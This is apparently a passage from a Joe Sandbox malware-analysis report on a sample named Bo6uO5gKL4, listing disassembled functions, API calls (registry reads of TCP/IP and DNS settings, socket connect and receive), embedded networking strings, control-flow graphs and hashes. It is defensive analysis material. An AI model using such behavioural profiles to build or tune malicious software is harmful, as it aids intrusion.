                                      • Instruction Fuzzy Hash: 90C17E716043159FDB18DF24C890A6AB7E2FF89314F05996CF8498B3A2DB71ED45CB81
                                      Function 00596FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7a912b35f3219386fe7117105ebb2facd7509ae0fe03dff7b2e1d324390f2552
                                      • Instruction ID: b3fdbc3d878bee1f3bb5b9e712bb1aee75dacb98c050d1505a8cc7fae6b7fab9
                                      • Opcode Fuzzy Hash: 7a912b35f3219386fe7117105ebb2facd7509ae0fe03dff7b2e1d324390f2552
                                      • Instruction Fuzzy Hash: 2291043062D30D8BDB358B6988847BBBAD5FFC8324F148B2DE899471D4E7759C40E691
                                      Function 0064A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0063712E,?,?,?,00001001,00000000), ref: 0064A90D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: recvfrom
                                      • String ID:
                                      • API String ID: 846543921-0
                                      • Opcode ID: 653bcbfe545fb3c783077bf804c0a11b8acb189214964e360aeb2b1fde8c1938
                                      • Instruction ID: 46e152d6e304ab40b08631d743e0e29df29cb6ac1190acd4e6462b58b685c9d5
                                      • Opcode Fuzzy Hash: 653bcbfe545fb3c783077bf804c0a11b8acb189214964e360aeb2b1fde8c1938
                                      • Instruction Fuzzy Hash: 4EF01D75118348BFD2209E41DC48DBBBBEDEFCA754F05495DF958133119271AE11CAB2
                                      Function 0063A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0063AA19
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0063AA4C
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0063AA97
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0063AAE9
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0063AB30
                                      • RegCloseKey.KERNELBASE(?), ref: 0063AB6A
                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0063AB82
                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0063AC46
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0063AD0A
                                      • RegEnumKeyExA.KERNELBASE ref: 0063AD8D
                                      • RegCloseKey.KERNELBASE(?), ref: 0063ADD9
                                      • RegEnumKeyExA.KERNELBASE ref: 0063AE08
                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0063AE2A
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0063AE54
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0063AF63
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0063AFB2
                                      • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0063B072
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: QueryValue$Open$CloseEnum
                                      • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                      • API String ID: 4217438148-1047472027
                                      • Opcode ID: a0e082cb52085370af7bbe6d5efc5a142fb06dd3447e1aa11c6aac899ff9d833
                                      • Instruction ID: 4841ddba1f244f63829b0f6c2cf21be6567ec7aa97b1122046030fc0e942868a
                                      • Opcode Fuzzy Hash: a0e082cb52085370af7bbe6d5efc5a142fb06dd3447e1aa11c6aac899ff9d833
                                      • Instruction Fuzzy Hash: 3072AFB1A04341AFE7209B64CC82F6BB7E9AF85700F14582CF985D72A1E771E944DB93
                                      Function 005BA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                      Download Yara Rule
                                      APIs
                                      • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 005BA832
                                      Strings
                                      • Local port: %hu, xrefs: 005BAF28
                                      • @, xrefs: 005BAC42
                                      • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 005BA6CE
                                      • Name '%s' family %i resolved to '%s' family %i, xrefs: 005BADAC
                                      • Trying [%s]:%d..., xrefs: 005BA689
                                      • bind failed with errno %d: %s, xrefs: 005BB080
                                      • Local Interface %s is ip %s using address family %i, xrefs: 005BAE60
                                      • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 005BAD0A
                                      • cf_socket_open() -> %d, fd=%d, xrefs: 005BA796
                                      • cf-socket.c, xrefs: 005BA5CD, 005BA735
                                      • Bind to local port %d failed, trying next, xrefs: 005BAFE5
                                      • Trying %s:%d..., xrefs: 005BA7C2, 005BA7DE
                                      • Couldn't bind to '%s' with errno %d: %s, xrefs: 005BAE1F
                                      • Could not set TCP_NODELAY: %s, xrefs: 005BA871
                                      • @, xrefs: 005BA8F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: setsockopt
                                      • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                      • API String ID: 3981526788-2373386790
                                      • Opcode ID: a1317538c661f86b4c23c2b8ecf399460dce3afe347e3fec6925a29225a7e4b2
                                      • Instruction ID: c73bb67a858c38fb53e51eff230ce32cae9595431117cb1309eea4d65d9f148a
                                      • Opcode Fuzzy Hash: a1317538c661f86b4c23c2b8ecf399460dce3afe347e3fec6925a29225a7e4b2
                                      • Instruction Fuzzy Hash: 7D62D171508381ABE7218F24C846FEBBBE4FF95314F044929F98897292E771E945CB93
                                      Function 00649740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 941 649740-64975b 942 649780-649782 941->942 943 64975d-649768 call 6478a0 941->943 945 649914-64994e call 908b70 RegOpenKeyExA 942->945 946 649788-6497a0 call 908e00 call 6478a0 942->946 951 64976e-649770 943->951 952 6499bb-6499c0 943->952 954 649950-649955 945->954 955 64995a-649992 RegQueryValueExA RegCloseKey call 908b98 945->955 946->952 956 6497a6-6497c5 946->956 951->956 957 649772-64977e 951->957 958 649a0c-649a15 952->958 954->958 969 649997-6499b5 call 6478a0 955->969 964 649827-649833 956->964 965 6497c7-6497e0 956->965 957->946 970 649835-64985c call 63e2b0 * 2 964->970 971 64985f-649872 call 645ca0 964->971 967 6497f6-649809 965->967 968 6497e2-6497f3 call 908b50 965->968 967->964 981 64980b-649810 967->981 968->967 969->952 969->956 970->971 982 6499f0 971->982 983 649878-64987d call 6477b0 971->983 981->964 986 649812-649822 981->986 985 6499f5-6499fb call 645d00 982->985 990 649882-649889 983->990 995 6499fe-649a09 985->995 986->958 990->985 994 64988f-64989b call 634fe0 990->994 994->982 999 6498a1-6498c3 call 908b50 call 6478a0 994->999 995->958 1005 6499c2-6499ed call 63e2b0 * 2 999->1005 1006 6498c9-6498db call 63e2d0 999->1006 1005->982 1006->1005 1010 6498e1-6498f0 call 63e2d0 1006->1010 1010->1005 1017 6498f6-649905 call 6463f0 1010->1017 1021 649f66-649f7f call 645d00 1017->1021 1022 64990b-64990f 1017->1022 1021->995 1023 649a3f-649a5a call 646740 call 6463f0 1022->1023 1023->1021 1030 649a60-649a6e call 646d60 1023->1030 1033 649a70-649a94 call 646200 call 6467e0 call 646320 1030->1033 1034 649a1f-649a39 call 646840 call 6463f0 1030->1034 1045 649a16-649a19 1033->1045 1046 649a96-649ac6 call 63d120 1033->1046 1034->1021 1034->1023 1045->1034 1048 649fc1 1045->1048 1051 649ae1-649af7 call 63d190 1046->1051 1052 649ac8-649adb call 63d120 1046->1052 1050 649fc5-649ffd call 645d00 call 63e2b0 * 2 1048->1050 1050->995 1051->1034 1060 649afd-649b09 call 634fe0 1051->1060 1052->1034 1052->1051 1060->1048 1066 649b0f-649b29 call 63e730 1060->1066 1070 649f84-649f88 1066->1070 1071 649b2f-649b3a call 6478a0 1066->1071 1074 649f95-649f99 1070->1074 1071->1070 1078 649b40-649b54 call 63e760 1071->1078 1076 649fa0-649fb6 call 63ebf0 * 2 1074->1076 1077 649f9b-649f9e 1074->1077 1088 649fb7-649fbe 1076->1088 1077->1048 1077->1076 1084 649f8a-649f92 1078->1084 1085 649b5a-649b6e call 63e730 1078->1085 1084->1074 1091 649b70-64a004 1085->1091 1092 649b8c-649b97 call 6463f0 1085->1092 1088->1048 1097 64a015-64a01d 1091->1097 1098 649b9d-649bbf call 646740 call 6463f0 1092->1098 1099 649c9a-649cab call 63ea00 1092->1099 1100 64a024-64a045 call 63ebf0 * 2 1097->1100 1101 64a01f-64a022 1097->1101 1098->1099 1118 649bc5-649bda call 646d60 1098->1118 1110 649f31-649f35 1099->1110 1111 649cb1-649ccd call 63ea00 call 63e960 1099->1111 1100->1050 1101->1050 1101->1100 1113 649f37-649f3a 1110->1113 1114 649f40-649f61 call 63ebf0 * 2 1110->1114 1129 649cfd-649d0e call 63e960 1111->1129 1130 649ccf 1111->1130 1113->1034 1113->1114 1114->1034 1118->1099 1128 649be0-649bf4 call 646200 call 6467e0 1118->1128 1128->1099 1149 649bfa-649c0b call 646320 1128->1149 1139 649d10 1129->1139 1140 649d53-649d55 1129->1140 1131 649cd1-649cec call 63e9f0 call 63e4a0 1130->1131 1150 649d47-649d51 1131->1150 1151 649cee-649cfb call 63e9d0 1131->1151 1144 649d12-649d2d call 63e9f0 call 63e4a0 1139->1144 1143 649e69-649e8e call 63ea40 call 63e440 1140->1143 1169 649e94-649eaa call 63e3c0 1143->1169 1170 649e90-649e92 1143->1170 1166 649d2f-649d3c call 63e9d0 1144->1166 1167 649d5a-649d6f call 63e960 1144->1167 1161 649b75-649b86 call 63ea00 1149->1161 1162 649c11-649c1c call 647b70 1149->1162 1156 649dca-649ddb call 63e960 1150->1156 1151->1129 1151->1131 1179 649ddd-649ddf 1156->1179 1180 649e2e-649e36 1156->1180 1161->1092 1188 649f2d 1161->1188 1162->1092 1183 649c22-649c33 call 63e960 1162->1183 1166->1144 1191 649d3e-649d42 1166->1191 1194 649d71-649d73 1167->1194 1195 649dc2 1167->1195 1198 649eb0-649eb1 1169->1198 1199 64a04a-64a04c 1169->1199 1176 649eb3-649ec4 call 63e9c0 1170->1176 1176->1034 1201 649eca-649ed0 1176->1201 1189 649e06-649e21 call 63e9f0 call 63e4a0 1179->1189 1185 649e3d-649e5b call 63ebf0 * 2 1180->1185 1186 649e38-649e3b 1180->1186 1210 649c35 1183->1210 1211 649c66-649c75 call 6478a0 1183->1211 1196 649e5e-649e67 1185->1196 1186->1185 1186->1196 1188->1110 1225 649de1-649dee call 63ec80 1189->1225 1226 649e23-649e2c call 63eac0 1189->1226 1191->1143 1206 649d9a-649db5 call 63e9f0 call 63e4a0 1194->1206 1195->1156 1196->1143 1196->1176 1198->1176 1204 64a057-64a070 call 63ebf0 * 2 1199->1204 1205 64a04e-64a051 1199->1205 1209 649ee5-649ef2 call 63e9f0 1201->1209 1204->1088 1205->1048 1205->1204 1239 649d75-649d82 call 63ec80 1206->1239 1240 649db7-649dc0 call 63eac0 1206->1240 1209->1034 1232 649ef8-649f0e call 63e440 1209->1232 1218 649c37-649c51 call 63e9f0 1210->1218 1228 64a011 1211->1228 1229 649c7b-649c8f call 63e7c0 1211->1229 1218->1092 1255 649c57-649c64 call 63e9d0 1218->1255 1243 649df1-649e04 call 63e960 1225->1243 1226->1243 1228->1097 1229->1092 1250 649c95-64a00e 1229->1250 1253 649f10-649f26 call 63e3c0 1232->1253 1254 649ed2-649edf call 63e9e0 1232->1254 1259 649d85-649d98 call 63e960 1239->1259 1240->1259 1243->1180 1243->1189 1250->1228 1253->1254 1267 649f28 1253->1267 1254->1034 1254->1209 1255->1211 1255->1218 1259->1195 1259->1206 1267->1048
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00649946
                                      • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00649974
                                      • RegCloseKey.KERNELBASE(?), ref: 0064998B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                      • API String ID: 3677997916-615551945
                                      • Opcode ID: 9eade4337ec45536ab4f18d12aec219545bc79e822d5d7e322ff567eb98c8ece
                                      • Instruction ID: 254cb97b1507ea59e998cd68d5a213e638464872de166a44c90815cf1ea0161d
                                      • Opcode Fuzzy Hash: 9eade4337ec45536ab4f18d12aec219545bc79e822d5d7e322ff567eb98c8ece
                                      • Instruction Fuzzy Hash: 4032E7B5944201ABEB51AB20EC42B5B76E6AF45318F084438F909963A3F732ED15C7B7
                                      Function 005B8B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1269 5b8b50-5b8b69 1270 5b8b6b-5b8b74 1269->1270 1271 5b8be6 1269->1271 1273 5b8beb-5b8bf2 1270->1273 1274 5b8b76-5b8b8d 1270->1274 1272 5b8be9 1271->1272 1272->1273 1275 5b8b8f-5b8ba7 call 596e40 1274->1275 1276 5b8bf3-5b8bfe call 5ba550 1274->1276 1283 5b8cd9-5b8d16 SleepEx getsockopt 1275->1283 1284 5b8bad-5b8baf 1275->1284 1281 5b8de4-5b8def 1276->1281 1282 5b8c04-5b8c08 1276->1282 1287 5b8e8c-5b8e95 1281->1287 1288 5b8df5-5b8e19 call 5ba150 1281->1288 1289 5b8c0e-5b8c1d 1282->1289 1290 5b8dbd-5b8dc3 1282->1290 1285 5b8d18-5b8d20 1283->1285 1286 5b8d22 1283->1286 1291 5b8ca6-5b8cb0 1284->1291 1292 5b8bb5-5b8bb9 1284->1292 1293 5b8d26-5b8d39 1285->1293 1286->1293 1294 5b8f00-5b8f06 1287->1294 1295 5b8e97-5b8e9c 1287->1295 1329 5b8e1b-5b8e26 1288->1329 1330 5b8e88 1288->1330 1297 5b8c1f-5b8c34 connect 1289->1297 1298 5b8c35-5b8c48 call 5ba150 1289->1298 1290->1272 1291->1283 1299 5b8cb2-5b8cb8 1291->1299 1292->1273 1300 5b8bbb-5b8bc2 1292->1300 1302 5b8d3b-5b8d3d 1293->1302 1303 5b8d43-5b8d61 call 59d8c0 call 5ba150 1293->1303 1294->1273 1304 5b8edf-5b8eef call 5878b0 1295->1304 1305 5b8e9e-5b8eb6 call 592a00 1295->1305 1297->1298 1324 5b8c4d-5b8c4f 1298->1324 1307 5b8cbe-5b8cd4 call 5bb180 1299->1307 1308 5b8ddc-5b8dde 1299->1308 1300->1273 1309 5b8bc4-5b8bcc 1300->1309 1302->1303 1302->1308 1336 5b8d66-5b8d74 1303->1336 1326 5b8ef2-5b8efc 1304->1326 1305->1304 1328 5b8eb8-5b8edd call 593410 * 2 1305->1328 1307->1281 1308->1272 1308->1281 1310 5b8bce-5b8bd2 1309->1310 1311 5b8bd4-5b8bda 1309->1311 1310->1273 1310->1311 1311->1273 1317 5b8bdc-5b8be1 1311->1317 1325 5b8dac-5b8db8 call 5c50a0 1317->1325 1333 5b8c8e-5b8c93 1324->1333 1334 5b8c51-5b8c58 1324->1334 1325->1273 1326->1294 1328->1326 1331 5b8e28-5b8e2c 1329->1331 1332 5b8e2e-5b8e85 call 59d090 call 5c4fd0 1329->1332 1330->1287 1331->1330 1331->1332 1332->1330 1341 5b8c99-5b8c9f 1333->1341 1342 5b8dc8-5b8dd9 call 5bb100 1333->1342 1334->1333 1339 5b8c5a-5b8c62 1334->1339 1336->1273 1343 5b8d7a-5b8d81 1336->1343 1346 5b8c6a-5b8c70 1339->1346 1347 5b8c64-5b8c68 1339->1347 1341->1291 1342->1308 1343->1273 1349 5b8d87-5b8d8f 1343->1349 1346->1333 1352 5b8c72-5b8c8b call 5c50a0 1346->1352 1347->1333 1347->1346 1354 5b8d9b-5b8da1 1349->1354 1355 5b8d91-5b8d95 1349->1355 1352->1333 1354->1273 1356 5b8da7 1354->1356 1355->1273 1355->1354 1356->1325
                                      APIs
                                      • connect.WS2_32(?,?,00000001), ref: 005B8C2F
                                      • SleepEx.KERNELBASE(00000000,00000000), ref: 005B8CF3
                                      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 005B8D0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: Sleepconnectgetsockopt
                                      • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                      • API String ID: 1669343778-879669977
                                      • Opcode ID: ba0ae063335ad92814c4fdcaa64320f71fd95ef49b85ead302e7505d6cf1ad5a
                                      • Instruction ID: 4375283f7fc4ff598db24aef7e9e8e291e705b290f139e2f1d1487cf1f0b8f9f
                                      • Opcode Fuzzy Hash: ba0ae063335ad92814c4fdcaa64320f71fd95ef49b85ead302e7505d6cf1ad5a
                                      • Instruction Fuzzy Hash: AFB19C70604706AFDB10CF24C989BB6BFA8BF85314F049929E8695B2D2DB71FC54C762
                                      Function 00582F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
